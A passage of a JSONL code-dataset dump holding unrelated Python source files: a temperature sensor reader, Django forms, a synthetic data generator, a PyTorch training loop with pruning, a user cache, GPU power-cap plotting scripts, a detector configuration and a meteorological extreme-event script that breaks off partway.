csv.reader(cluster_file)\r\n\tclusters = []\r\n\tfor line in reader:\r\n\t\tif line:\r\n\t\t\tclusters.append([int(i) for i in line])\r\n\t\t\r\n\toutlier_file = open('datasets/saved_outliers.csv', 'r')\r\n\treader = csv.reader(outlier_file)\r\n\tfor line in reader:\r\n\t\tif line:\r\n\t\t\toutliers = [int(i) for i in line]\r\n\r\n\tplot_3d_clusters(data, clusters, outliers)","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"472830546","text":"import logging\nimport numpy as np\nfrom piweather.sensors import Sensor\n\n\nclass DS18x20(Sensor):\n\n    dtypes = {\n        \"temperature\": float,\n    }\n\n    def __init__(self, path, *args, **kwargs):\n        super(DS18x20, self).__init__(*args, **kwargs)\n        self._path = path\n\n    @property\n    def path(self):\n        return self._path\n\n    def read(self):\n        try:\n            logging.debug(\"DS18x20: opening path: {}\".format(self.path))\n            with open(self.path, \"r\") as f:\n                lines = f.readlines()\n        except FileNotFoundError:\n            logging.error(\"DS18x20: File not found at {}\".format(self.path))\n            return {\"temperature\": np.NaN}\n\n        if self._crc_is_invalid(lines):\n            logging.warning(\"DS18x20: invalid CRC\")\n            return {\"temperature\": np.NaN}\n\n        raw = self._extract_raw_temperature(lines)\n        if raw == \"85000\":\n            logging.warning(\"DS18x20: T=85000 error occurred\")\n            return {\"temperature\": np.NaN}\n\n        return {\n            \"temperature\": int(raw)/1000,\n        }\n\n    def _extract_raw_temperature(self, lines):\n        last_token = lines[1].split(\" \")[-1]\n        return last_token[len(\"t=\"):].strip()\n\n    def _crc_is_invalid(self, lines):\n        return \"YES\" not in lines[0]\n","sub_path":"piweather/sensors/DS18x20.py","file_name":"DS18x20.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"411834609","text":"from django import forms\nfrom ckeditor.widgets import CKEditorWidget\n\nfrom website.project.spam.model import SpamStatus\n\n\nclass EmailForm(forms.Form):\n    author = forms.CharField(label='Author', max_length=100)\n    email = forms.ChoiceField(label='Email')\n    subject = forms.CharField(label='Subject', required=True)\n    message = forms.CharField(label='Message', required=True,\n                              widget=CKEditorWidget())\n\n    def __init__(self, *args, **kwargs):\n        choices = kwargs.get('initial', {}).get('email', [])\n        self.base_fields['email'] = forms.ChoiceField(choices=choices)\n        super(EmailForm, self).__init__(*args, **kwargs)\n\n\nclass 
ConfirmForm(forms.Form):\n confirm = forms.ChoiceField(\n choices=[(SpamStatus.SPAM, 'Spam'), (SpamStatus.HAM, 'Ham')],\n widget=forms.RadioSelect(),\n )\n","sub_path":"admin/spam/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"401946519","text":"import numpy as np\nfrom draw import *\n\nK = 10\nL = 20\nn_batch = 50\n\n# ------------------------------------------------------------------ helpers\n\n# pad a list into its final length and also turn it into a numpy array\ndef pad_and_numpy(lst, final_length):\n # convert\n lst = [np.array(x, np.float32) for x in lst]\n length = len(lst)\n # crop if too long\n if length > final_length:\n return lst[:final_length]\n item_shape = lst[0].shape\n return lst + [np.zeros(item_shape, np.float32) for i in range(final_length - length)]\n\ndef dist(pt1, pt2):\n x1, y1 = pt1\n x2, y2 = pt2\n return np.sqrt(np.power(x1-x2,2) + np.power(y1-y2,2))\n\ndef coord_2_loc(coord, ll = L):\n ret = np.zeros([ll, ll, 1])\n for i in range(ll):\n for j in range(ll):\n grid_coord_i = i + 0.5\n grid_coord_j = j + 0.5\n ret[i][j][0] = np.exp(-dist((grid_coord_i, grid_coord_j), coord))\n return ret\n\ndef coord_2_loc_obs(coord, label, ll = L):\n chan_idx = 0 if label[0] == 1.0 else 1\n ret = np.zeros([ll, ll, 2])\n for i in range(ll):\n for j in range(ll):\n grid_coord_i = i + 0.5\n grid_coord_j = j + 0.5\n ret[i][j][chan_idx] = np.exp(-dist((grid_coord_i, grid_coord_j), coord))\n return ret\n\n# show dimension of a data object (list of list or a tensor)\ndef show_dim(lst1):\n if hasattr(lst1, '__len__') and len(lst1) > 0:\n return [len(lst1), show_dim(lst1[0])]\n else:\n try:\n return lst1.get_shape()\n except:\n try:\n return lst1.shape\n except:\n return type(lst1)\n\n# --------------------------------------------------------------- modelings\n# generate the hidden state\ndef gen_Z(ll = L):\n x_coord = np.random.random() * ll\n y_coord = np.random.random() * ll\n return x_coord, y_coord\n\ndef gen_X(Z, ll = L):\n ll = float(ll)\n Xx = np.random.random() * ll\n Xy = np.random.random() * ll\n X = (Xx, Xy)\n if dist(Z,X) < ll / 2.0:\n return X, [1.0, 0.0]\n else:\n return X, [0.0, 1.0]\n \n# data of the form of\n# k_locs: the k observation locations\n# k_TFs: the true/false value of these observations\n# k_weights: the average 1/k weight for each observation\n# query_loc: the new query location\n# query_TF: the TF for that particular new query\n# z_loc: the location for the hidden state Z\n# all variables are a list of tensors of dimention [n_batch x ...] 
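The coord_2_loc helpers above rasterize a coordinate into an exp(-distance) bump over an L x L grid using two nested Python loops; a vectorized numpy equivalent (a sketch that keeps the same cell-center convention, not code from the original file) is:

import numpy as np

L = 20

def coord_2_loc_vectorized(coord, ll=L):
    # Same exp(-euclidean distance) bump as coord_2_loc, minus the Python loops.
    ii, jj = np.meshgrid(np.arange(ll) + 0.5, np.arange(ll) + 0.5, indexing='ij')
    d = np.sqrt((ii - coord[0]) ** 2 + (jj - coord[1]) ** 2)
    return np.exp(-d)[:, :, None]  # shape [ll, ll, 1], matching coord_2_loc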
\ndef gen_data(n_batch = n_batch, K=K):\n # LIST of length K (1 for each input)\n # each element of shape [batch x loc]\n k_locs = [[] for i in range(K)]\n # tensor shape [batch x K] (no more list after trying to join together)\n k_weights = []\n # tensor shape of [batch x loc]\n query_loc = []\n # tensor shape of [batch x 2] (2 classes, T or F)\n query_TF = []\n # tensor shape of [batch x loc]\n z_loc = []\n\n for bb in range(n_batch):\n # generate a hidden variable Z for each batch\n Z_coord = gen_Z()\n _z_loc = coord_2_loc(Z_coord)\n z_loc.append(_z_loc)\n # generate and add query location\n _query_coord, _query_TF = gen_X(Z_coord)\n _query_loc = coord_2_loc(_query_coord)\n query_loc.append(_query_loc)\n query_TF.append(_query_TF)\n # for each batch, decide how many sample observations we want to draw\n k = np.random.randint(1,K)\n # then re-weight each input layer by the appropriate weight\n _k_weights = [0.0 for _ in range(K)]\n _k_weights[k-1] = 1.0\n k_weights.append(_k_weights)\n\n # for easier padding and such, generate these for each batch then mush them in\n # only the list of tensors need this treatment, otherwise just batch them in ok\n b_k_locs = []\n for _ in range(k):\n obs_x, obs_lab = gen_X(Z_coord)\n obs_x_loc = coord_2_loc_obs(obs_x, obs_lab)\n b_k_locs.append(obs_x_loc)\n\n b_k_locs = pad_and_numpy(b_k_locs, K) \n for kkk in range(K):\n k_locs[kkk].append(b_k_locs[kkk]) \n\n return k_locs, \\\n np.array(k_weights, np.float32), \\\n np.array(query_loc, np.float32), \\\n np.array(query_TF, np.float32), \\\n np.array(z_loc, np.float32)\n \n# dat_in, dat_out = gen_data()\n# print np.shape(dat_in)\n# print dat_out\n \n\n#sqs = gen_squares()\n#draw(gen_squares())\n# Z = gen_Z()\n# print Z\n# draw(coord_2_loc(Z))\n\n","sub_path":"pokemon2/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":4152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"167366991","text":"from loggers import *\nfrom config import STATE_DICT_KEY, OPTIMIZER_STATE_DICT_KEY\nfrom utils import AverageMeterSet\nfrom pruners import smallweightprune\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom tensorboardX import SummaryWriter\nfrom tqdm import tqdm\n\n\nfrom abc import *\nfrom pathlib import Path\n\n\nclass AbstractTrainer(metaclass=ABCMeta):\n def __init__(self, args, model, train_loader, val_loader, test_loader, export_root, pruner):\n self.args = args\n self.device = args.device\n self.model = model.to(self.device)\n self.is_parallel = args.num_gpu > 1\n if self.is_parallel:\n self.model = nn.DataParallel(self.model)\n\n self.train_loader = train_loader\n self.val_loader = val_loader\n self.test_loader = test_loader\n self.optimizer = self._create_optimizer()\n self.lr_scheduler = optim.lr_scheduler.StepLR(self.optimizer, step_size=args.decay_step, gamma=args.gamma)\n\n self.num_epochs = args.num_epochs\n self.metric_ks = args.metric_ks\n self.best_metric = args.best_metric\n\n self.export_root = export_root\n self.writer, self.train_loggers, self.val_loggers = self._create_loggers()\n self.add_extra_loggers()\n self.logger_service = LoggerService(self.train_loggers, self.val_loggers)\n self.log_period_as_iter = args.log_period_as_iter\n\n self.pruner = pruner\n self.prune_code = args.prune_code\n self.pruning_perc = args.pruning_perc\n self.pruning_perc_embed = args.pruning_perc_embed\n self.pruning_perc_feed = args.pruning_perc_feed\n self.num_prune_epochs = args.num_prune_epochs\n self.prune_code = 
args.prune_code\n self.dataset_code = args.dataset_code\n\n\n @abstractmethod\n def add_extra_loggers(self):\n pass\n\n @abstractmethod\n def log_extra_train_info(self, log_data):\n pass\n\n @classmethod\n @abstractmethod\n def code(cls):\n pass\n\n @abstractmethod\n def calculate_loss(self, batch):\n pass\n\n @abstractmethod\n def calculate_metrics(self, batch):\n pass\n\n def train(self):\n accum_iter = 0\n self.validate(0, accum_iter)\n for epoch in range(self.num_epochs):\n accum_iter = self.train_one_epoch(epoch, accum_iter)\n self.validate(epoch, accum_iter)\n self.logger_service.complete({\n 'state_dict': (self._create_state_dict()),\n })\n self.writer.close()\n \n def prune(self):\n accum_iter = 0\n self.validate(0, accum_iter)\n for epoch in range(self.num_prune_epochs):\n accum_iter = self.train_one_epoch(epoch, accum_iter, True)\n self.validate(epoch, accum_iter)\n self.logger_service.complete({\n 'state_dict': (self._create_state_dict()),\n })\n self.writer.close()\n\n \n def train_one_epoch(self, epoch, accum_iter, do_prune=False):\n self.model.train()\n self.lr_scheduler.step()\n\n average_meter_set = AverageMeterSet()\n tqdm_dataloader = tqdm(self.train_loader)\n\n if do_prune:\n masks = self.pruner.weight_prune(self.model, self.pruning_perc, self.pruning_perc_embed, self.pruning_perc_feed)\n self.model.set_masks(masks)\n \n for batch_idx, batch in enumerate(tqdm_dataloader):\n batch_size = batch[0].size(0)\n batch = [x.to(self.device) for x in batch]\n\n self.optimizer.zero_grad()\n\n loss = self.calculate_loss(batch)\n loss.backward()\n\n self.optimizer.step()\n\n average_meter_set.update('loss', loss.item())\n tqdm_dataloader.set_description(\n 'Epoch {}, loss {:.3f} '.format(epoch+1, average_meter_set['loss'].avg))\n\n accum_iter += batch_size\n\n if self._needs_to_log(accum_iter):\n tqdm_dataloader.set_description('Logging to Tensorboard')\n log_data = {\n 'state_dict': (self._create_state_dict()),\n 'epoch': epoch,\n 'accum_iter': accum_iter,\n }\n log_data.update(average_meter_set.averages())\n self.log_extra_train_info(log_data)\n self.logger_service.log_train(log_data)\n\n return accum_iter\n\n def validate(self, epoch, accum_iter):\n self.model.eval()\n\n average_meter_set = AverageMeterSet()\n\n with torch.no_grad():\n tqdm_dataloader = tqdm(self.val_loader)\n for batch_idx, batch in enumerate(tqdm_dataloader):\n batch = [x.to(self.device) for x in batch]\n\n metrics = self.calculate_metrics(batch)\n\n for k, v in metrics.items():\n average_meter_set.update(k, v)\n description_metrics = ['NDCG@%d' % k for k in self.metric_ks[:3]] +\\\n ['Recall@%d' % k for k in self.metric_ks[:3]]\n description = 'Val: ' + ', '.join(s + ' {:.3f}' for s in description_metrics)\n description = description.replace('NDCG', 'N').replace('Recall', 'R')\n description = description.format(*(average_meter_set[k].avg for k in description_metrics))\n tqdm_dataloader.set_description(description)\n\n log_data = {\n 'state_dict': (self._create_state_dict()),\n 'epoch': epoch,\n 'accum_iter': accum_iter,\n }\n log_data.update(average_meter_set.averages())\n self.logger_service.log_val(log_data)\n\n def test(self):\n self.model.eval()\n\n average_meter_set = AverageMeterSet()\n\n with torch.no_grad():\n tqdm_dataloader = tqdm(self.test_loader)\n for batch_idx, batch in enumerate(tqdm_dataloader):\n batch = [x.to(self.device) for x in batch]\n\n metrics = self.calculate_metrics(batch)\n\n for k, v in metrics.items():\n average_meter_set.update(k, v)\n description_metrics = ['NDCG@%d' % k for k in 
self.metric_ks[:3]] +\\\n ['Recall@%d' % k for k in self.metric_ks[:3]]\n description = 'Test: ' + ', '.join(s + ' {:.3f}' for s in description_metrics)\n description = description.replace('NDCG', 'N').replace('Recall', 'R')\n description = description.format(*(average_meter_set[k].avg for k in description_metrics))\n tqdm_dataloader.set_description(description)\n return {\n 'dataset': self.dataset_code,\n 'pruning_code': self.prune_code,\n 'pruning_perc': self.pruning_perc,\n 'pruning_perc_embed': self.pruning_perc_embed,\n 'pruning_perc_feed': self.pruning_perc_feed,\n 'pruning_epochs': self.num_prune_epochs,\n 'num_epochs': self.num_epochs,\n 'result': description,\n }\n\n\n def _create_optimizer(self):\n args = self.args\n if args.optimizer.lower() == 'adam':\n return optim.Adam(self.model.parameters(), lr=args.lr, weight_decay=args.weight_decay)\n elif args.optimizer.lower() == 'sgd':\n return optim.SGD(self.model.parameters(), lr=args.lr, weight_decay=args.weight_decay, momentum=args.momentum)\n else:\n raise ValueError\n\n def _create_loggers(self):\n root = Path(self.export_root)\n writer = SummaryWriter(root.joinpath('logs'))\n model_checkpoint = root.joinpath('models')\n\n train_loggers = [\n MetricGraphPrinter(writer, key='epoch', graph_name='Epoch', group_name='Train'),\n MetricGraphPrinter(writer, key='loss', graph_name='Loss', group_name='Train'),\n ]\n\n val_loggers = []\n for k in self.metric_ks:\n val_loggers.append(\n MetricGraphPrinter(writer, key='NDCG@%d' % k, graph_name='NDCG@%d' % k, group_name='Validation'))\n val_loggers.append(\n MetricGraphPrinter(writer, key='Recall@%d' % k, graph_name='Recall@%d' % k, group_name='Validation'))\n val_loggers.append(RecentModelLogger(model_checkpoint))\n val_loggers.append(BestModelLogger(model_checkpoint, metric_key=self.best_metric))\n return writer, train_loggers, val_loggers\n\n def _create_state_dict(self):\n return {\n STATE_DICT_KEY: self.model.module.state_dict() if self.is_parallel else self.model.state_dict(),\n OPTIMIZER_STATE_DICT_KEY: self.optimizer.state_dict(),\n }\n\n def _needs_to_log(self, accum_iter):\n return accum_iter % self.log_period_as_iter < self.args.train_batch_size and accum_iter != 0","sub_path":"trainers/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":8779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"261279033","text":"\n\nfrom xai.brain.wordbase.nouns._guardian import _GUARDIAN\n\n#calss header\nclass _GUARDIANS(_GUARDIAN, ):\n\tdef __init__(self,): \n\t\t_GUARDIAN.__init__(self)\n\t\tself.name = \"GUARDIANS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"guardian\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_guardians.py","file_name":"_guardians.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"228037937","text":"import config\nimport time\nimport log\nimport threading\n\nclass user_cache:\n\n invalidate_interval = config.get('user_cache.invalidate_interval', 'i')\n\n def __init__(self, api, fields):\n self.api = api\n self.fields = fields\n self.users = {}\n self.lock = threading.RLock()\n\n def load(self, uid, clean=False):\n uid = list(map(int, uid))\n\n try:\n to_get = []\n with self.lock:\n ctime = time.time()\n for user in uid:\n if user > 0 and (clean or user not in self.users or self.users[user][0] + self.invalidate_interval - 5 < ctime):\n to_get.append(user)\n if to_get:\n resp = 
self.api.users.get(user_ids=','.join(map(str, to_get)), fields=self.fields)\n for user in resp:\n self.users[user['id']] = (ctime, user)\n except Exception:\n log.error('user_cache error', True)\n return None\n\n def __getitem__(self, uid):\n uid = int(uid)\n try:\n with self.lock:\n if uid not in self.users or self.users[uid][0] + self.invalidate_interval < time.time():\n self.load([uid])\n return self.users[uid][1]\n except Exception:\n log.error('user_cache error', True)\n return None\n\n def __delitem__(self, uid):\n uid = int(uid)\n with self.lock:\n if uid in self.users:\n del self.users[uid]\n\n def clear(self):\n with self.lock:\n self.users = {}\n\n def gc(self):\n with self.lock:\n t = time.time()\n for uid in list(self.users):\n if self.users[uid][0] + self.invalidate_interval < t:\n del self.users[uid]\n","sub_path":"user_cache.py","file_name":"user_cache.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"101230046","text":"#%load_ext autoreload\n#%autoreload 2\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nimport matplotlib as mpl\nfrom pathlib import Path\nfrom datetime import datetime\nimport pint\nunit = pint.UnitRegistry()\nmpl.rcParams['figure.dpi'] = 300\n\nfrom util import *\n\n\n# %%\nGPU1=1\ndevices=[GPU1]\npower_caps = [150, 200, 250, 300]\n\n#%%\ndef load_power_cap_data(data_root, network, epoch_count):\n \n data_root = Path(data_root)\n runs = list(data_root.glob(\"run*\"))\n\n all_data = []\n\n for cap in power_caps:\n for run in runs:\n description = f\"powercap{cap}-{network}\"\n #print(description)\n data_path = list(run.glob(f\"{description}*\"))[0]\n power_data = PowerData.load(data_path)\n #assert power_data.t_info.get_epoch_count() == epoch_count, f\"Unexpected Number of epochs! 
Expected: {epoch_count}, but got: {power_data.t_info.get_epoch_count()} in {data_path}\"\n            #epoch_energy = get_energy_per_epoch(power_data, devices=devices)\n            #energy = np.mean(epoch_energy[1:])\n            \n            #epoch_times = power_data.t_info.get_time_per_epoch()\n            #mean_time = np.mean(epoch_times[1:])\n            print(description)\n            \n            total_time = power_data.t_info.total_experiment_duration() / np.timedelta64(1, \"s\")\n            total_energy = calculate_total_energy(power_data, devices=devices\n                , start=power_data.t_info.experiment_begin()\n                , end=power_data.t_info.experiment_end())\n            \n            edp = total_energy * total_time\n\n            cum_energy = calculate_total_cumulative_energy(power_data, devices=devices\n                , start=power_data.t_info.experiment_begin()\n                , end=power_data.t_info.experiment_end())[0]\n\n            tmp = {\n                \"power_cap\":cap\n                ,\"total_time\":total_time\n                ,\"total_energy\":total_energy\n                ,\"cum_energy\": cum_energy\n                ,\"edp\": edp\n                ,\"run\": str(run).split(\"/\")[-1].replace(\"run\",\"\")\n                ,\"power_data\": power_data\n            }\n            all_data.append(tmp)\n    return all_data\n\n# %%\ndef plot_all(df, net):\n    plot_power_raw(df, devices[0], net)\n    plt.clf()\n    plot_cum_energy(df,net)\n    plt.clf()\n    # epoch_times_boxplot(df, net)\n    # plt.clf()\n    # epoch_energy_boxplot(df, net)\n    # plt.clf()\n    plot_mean_total_energy(df, net)\n    plt.clf()\n    plot_mean_edp(df, net)\n    plt.clf()\n    plot_mean_total_time(df, net)\n\n\n\n# %%\ndef plot_power_raw(df, device_idx, net):\n    fig, ax = plt.subplots(len(power_caps), 1, sharex=True)\n    for index,(_, pl) in enumerate(df[df.run == \"1\"].iterrows()):\n        current_ax = ax[index]\n        power_data = pl[\"power_data\"]\n        device = power_data.power_gpu[power_data.power_gpu[\"gpu-index\"] == device_idx]\n        timestamps = (np.array(device.timestamp) - np.array(device.timestamp)[0]) / np.timedelta64(1, \"s\")\n        current_ax.plot(timestamps, device.power)\n        current_ax.set_ylim(0,310)\n\n        # for i, epoch_begin, _ in power_data.t_info.epochs():\n        #     epoch_ts = (epoch_begin - np.array(device.timestamp)[0]) / np.timedelta64(1, \"s\")\n        #     current_ax.axvline(x=epoch_ts,color='orange',linestyle='--')\n        current_ax.set_ylabel(\"Power [W]\")\n        current_ax.set_xlabel(\"Time [s]\")\n    fig.suptitle(f\"[{net}]GPU Power vs. 
Time w/ Power Limits [150, 200 ,250, 300]\")\n #plt.tight_layout() \n plt.show()\n plt.savefig(fig_root/f\"{net}-power-raw.png\")\n\n\n#plot_power_raw(mnist_data_big, devices[0], \"mnist-big\")\n# %%\n\ndef plot_cum_energy(df, net):\n runs = df.groupby(\"run\")\n for run_idx, run in runs:\n pl_list =[]\n for pl_idx, pl in run.groupby(\"power_cap\"):\n pl = pl.iloc[0]\n pl_list.append(pl_idx)\n #epoch2_begin = pl.power_data.t_info.get_epoch_begin(1)\n\n plt.plot(pl.cum_energy/MEGA)\n #plt.plot((epoch2_begin-pl.power_data.power_gpu.iloc[0].timestamp)/np.timedelta64(1,\"s\"),0,\"x\")\n plt.legend([f\"{x}W\" for x in pl_list])\n plt.title(f\"[{net}]Cumulative Energy w/ Power Limits (Run {run_idx})\")\n plt.xlabel(\"Time [$s$]\")\n plt.ylabel(\"Energy [$MJ$]\")\n plt.show()\n plt.savefig(fig_root/f\"{net}-cum-energy-{run_idx}.png\")\n plt.clf()\n\n#plot_cum_energy(mnist_data_big)\n\n# %%\ndef epoch_times_hist(df, net):\n times = {}\n for pl_idx, pl in df.groupby(\"power_cap\"):\n times[pl_idx] = []\n for run_idx, run in pl.groupby(\"run\"):\n run = run.iloc[0]\n times[pl_idx].extend(run.epoch_times[1:])\n \n plt.hist(times[pl_idx], bins=30)\n plt.title(f\"[{net}]Distribution of Time per Epoch ({pl_idx}W)\")\n plt.show()\n plt.savefig(fig_root/f\"{net}-epoch-times-hist-{pl_idx}.png\")\n\n\n#epoch_times_hist(mnist_data_big)\n\n\n# %%\ndef epoch_times_boxplot(df, net):\n times = {}\n for pl_idx, pl in df.groupby(\"power_cap\"):\n times[pl_idx] = []\n for run_idx, run in pl.groupby(\"run\"):\n run = run.iloc[0]\n times[pl_idx].extend(run.epoch_times[1:])\n \n plt.boxplot(times.values())\n plt.xticks(*zip(*enumerate([f\"{x}W\" for x in times.keys()],1)))\n plt.title(f\"[{net}]Time per Epoch\")\n plt.ylabel(\"Time [s]\")\n plt.show()\n plt.savefig(fig_root/f\"{net}-epoch-times-boxplot.png\")\n\n\n#epoch_times_boxplot(mnist_data_big)\n\n\n\n# %%\ndef epoch_energy_hist(df, net):\n times = {}\n for pl_idx, pl in df.groupby(\"power_cap\"):\n times[pl_idx] = []\n for run_idx, run in pl.groupby(\"run\"):\n run = run.iloc[0]\n times[pl_idx].extend(run.epoch_energy[1:])\n \n plt.hist(times[pl_idx], bins=30)\n plt.title(f\"[{net}]Distribution of Energy per Epoch ({pl_idx}W)\")\n plt.show()\n plt.savefig(fig_root/f\"{net}-epoch-energy-hist-{pl_idx}.png\")\n\n\n#epoch_energy_hist(mnist_data_big)\n\n\n# %%\ndef epoch_energy_boxplot(df, net):\n times = {}\n for pl_idx, pl in df.groupby(\"power_cap\"):\n times[pl_idx] = []\n for run_idx, run in pl.groupby(\"run\"):\n run = run.iloc[0]\n times[pl_idx].extend(run.epoch_energy[1:])\n \n plt.boxplot(times.values())\n plt.xticks(*zip(*enumerate([f\"{x}W\" for x in times.keys()],1)))\n plt.title(f\"[{net}]Energy per Epoch\")\n plt.ylabel(\"Energy [J]\")\n plt.show()\n plt.savefig(fig_root/f\"{net}-epoch-energy-boxplot.png\")\n\n\n#epoch_energy_boxplot(mnist_data_big)\n\n# %%\ndef plot_mean_metric(df, metric, net, scale):\n energy = {}\n for pl_idx, pl in df.groupby(\"power_cap\"):\n energy[pl_idx] = []\n for run_idx, run in pl.groupby(\"run\"):\n run = run.iloc[0]\n energy[pl_idx].append(run[metric])\n \n plt.plot([x for x in energy.keys()], np.array([np.array(x).mean() for x in energy.values()]) / scale, \"x\")\n plt.xlabel(\"Power Limit [W]\")\n plt.xticks(power_caps)\n\n# %%\ndef plot_mean_total_energy(df, net):\n plot_mean_metric(df, \"total_energy\", net, MEGA)\n plt.title(f\"[{net}]Mean Total Energy vs. 
Power Limit\")\n plt.ylabel(\"Energy [MJ]\")\n plt.show()\n plt.savefig(fig_root/f\"{net}-mean-total-energy.png\")\n\n\n#plot_mean_total_energy(mnist_data_big, \"MNIST-Big\")\n\n\n#%%\ndef plot_mean_edp(df, net):\n plot_mean_metric(df, \"edp\", net, MEGA)\n plt.title(f\"[{net}]Mean EDP vs. Power Limit\")\n plt.ylabel(\"Energy Delay Product [MJs]\")\n plt.show()\n plt.savefig(fig_root/f\"{net}-mean-edp.png\")\n\n#plot_mean_edp(mnist_data_big)\n\n\n#%%\ndef plot_mean_total_time(df, net):\n plot_mean_metric(df, \"total_time\", net, 1) \n plt.title(f\"[{net}]Mean Total Time vs. Power Limit\")\n plt.ylabel(\"Time [s]\")\n plt.show()\n plt.savefig(fig_root/f\"{net}-mean-total-time.png\")\n\n\nimport matplotlib\nmatplotlib.use('Agg')\nfig_root = Path(\"../report/fig\")\nfig_root.mkdir(parents=True, exist_ok=True)\n\n# mnist_data_big = load_power_cap_data(\"../data/data-1.2\", \"mnist-big\", epoch_count = 10)\n# mnist_data_big = pd.DataFrame(mnist_data_big)\n# plot_all(mnist_data_big, \"mnist-big\")\n\n\n# mnist_data_small = load_power_cap_data(\"../data/data-1.2\", \"mnist-2\", epoch_count = 10)\n# mnist_data_small = pd.DataFrame(mnist_data_small)\n# plot_all(mnist_data_small, \"mnist-small\")\n\necg_data = load_power_cap_data(\"../data/data-1.3.1\", \"ecg\", epoch_count = 5)\necg_data = pd.DataFrame(ecg_data)\nplot_all(ecg_data, \"ecg\")","sub_path":"gpyjoules/make_plots_ecg.py","file_name":"make_plots_ecg.py","file_ext":"py","file_size_in_byte":8596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"582758316","text":"# -*- coding: utf-8 -*-\r\n\r\nimport re\r\nfrom abc import ABCMeta\r\nfrom erobot.items.enkou55_items import Enkou55JPTitleImageItem\r\nfrom erobot.configs.enkou55_xpath_config import Enkou55ImageXPathConfig\r\nfrom erobot.contrib.title_image_item_loader import TitleImageItemLoader\r\nfrom erobot.utils.items import get_image_name\r\n\r\n\r\nclass Enkou55TitleImageItemLoader(TitleImageItemLoader):\r\n __metaclass__ = ABCMeta\r\n \r\n def __init__(self, item, response):\r\n super(Enkou55TitleImageItemLoader, self).__init__(item, response,\r\n Enkou55ImageXPathConfig().title.image_urls)\r\n \r\n def __getitem__(self, key):\r\n image_urls = []\r\n if key == 'face' or key == 'thumbnail':\r\n image_urls = self._hxs.select(self._xpath_config[key]).extract()\r\n elif key == 'player':\r\n pattern = re.compile(r'http://.*\\.enkou55.com/images/title/\\d{2}/\\d{2}/\\d{2}/player.jpg')\r\n if self._hxs.select(self._xpath_config[key]).extract():\r\n image_urls = [re.search(pattern, self._hxs.select(self._xpath_config[key]).extract()[0]).group()]\r\n elif key in self.keys():\r\n pass\r\n else:\r\n raise KeyError(key)\r\n if image_urls:\r\n return [{'name': get_image_name(image_url), 'original_url': image_url} for image_url in image_urls]\r\n \r\n \r\nclass Enkou55JPTitleImageItemLoader(Enkou55TitleImageItemLoader):\r\n def __init__(self, response):\r\n super(Enkou55JPTitleImageItemLoader, self).__init__(Enkou55JPTitleImageItem(), response)\r\n","sub_path":"erovideo/erobot/contrib/enkou55/enkou55_title_image_item_loader.py","file_name":"enkou55_title_image_item_loader.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"406803083","text":"import FWCore.ParameterSet.Config as cms\n\npfClustersFromHGC3DClustersEM = cms.EDProducer(\"PFClusterProducerFromHGC3DClusters\",\n src = cms.InputTag(\"hgcalTriggerPrimitiveDigiProducer\",\"cluster3D\"),\n 
emOnly = cms.bool(True),\n etMin = cms.double(0.0), \n corrector = cms.string(\"L1Trigger/Phase2L1ParticleFlow/data/ecorr.root\"),\n resol = cms.PSet(\n etaBins = cms.vdouble( 1.300, 1.700, 2.800, 3.200),\n offset = cms.vdouble( 1.158, 1.545, 0.732, 0.551),\n scale = cms.vdouble( 0.014, 0.024, 0.028, 0.031),\n kind = cms.string('calo'),\n )\n)\n","sub_path":"Phase2L1ParticleFlow/python/pfClustersFromHGC3DClustersEM_cfi.py","file_name":"pfClustersFromHGC3DClustersEM_cfi.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"261259628","text":"# Extreme events detection\n# \n# According to IEC standards there are 6 main classes of exteme events:\n# \n# - Extreme wind speed model (EWM)\n# - Extreme operating gust (EOG)\n# - Extreme turbuelnce model (ETM)\n# - Extreme direction change (EDC)\n# - Extreme coherent gust wind direction change (ECD)\n# - Extreme wind shear (EWS)\n# \n# Each of these are to be quantified through the high resolution data, as they typically happen over a range of < 10s.\n\n# fundamentals\nimport os, glob\nimport numpy as np\nimport pandas as pd\nfrom calendar import monthrange, month_name\nimport scipy.stats as stats\nimport datetime\nimport imp\nimport scipy.io as sio\nimport pickle as pkl\n\n# met mast functions and utilities\nimport met_funcs as MET\n\n\n# time range\n# years = [ int(a) for a in np.arange(2012,2019,1) ] #\nmonths = [ int(a) for a in np.arange(1,12.1,1) ]\ndays = [int(a) for a in np.arange(1,31.1,1)]\n\n# paths (must mount volume smb://nrel.gov/shared/wind/WindWeb/MetData/135mData/)\ntowerID = 'M5'\nfigPath = '../../figs/{}'.format(towerID)\n\nmetDataPath = '/Volumes/135mData/{}Twr/20Hz/mat/'.format(towerID)\n\n#################\n# read data, look for events, save time index\n#################\n\nyears = [2017,2018]\n# months = [4]\n# days=[1]\nprobeheight=100\n \ntry:\n savepath = '/Users/nhamilto/Documents/Wake_Dynamics/SiteChar/data/IEC'\n os.makedirs(savepath)\nexcept:\n pass\n\nfor year in years:\n for month in months:\n \n # begin empty lists for events\n Ve01events = []\n Ve50events = []\n EOGevents = []\n ETMevents = []\n EDCevents = []\n 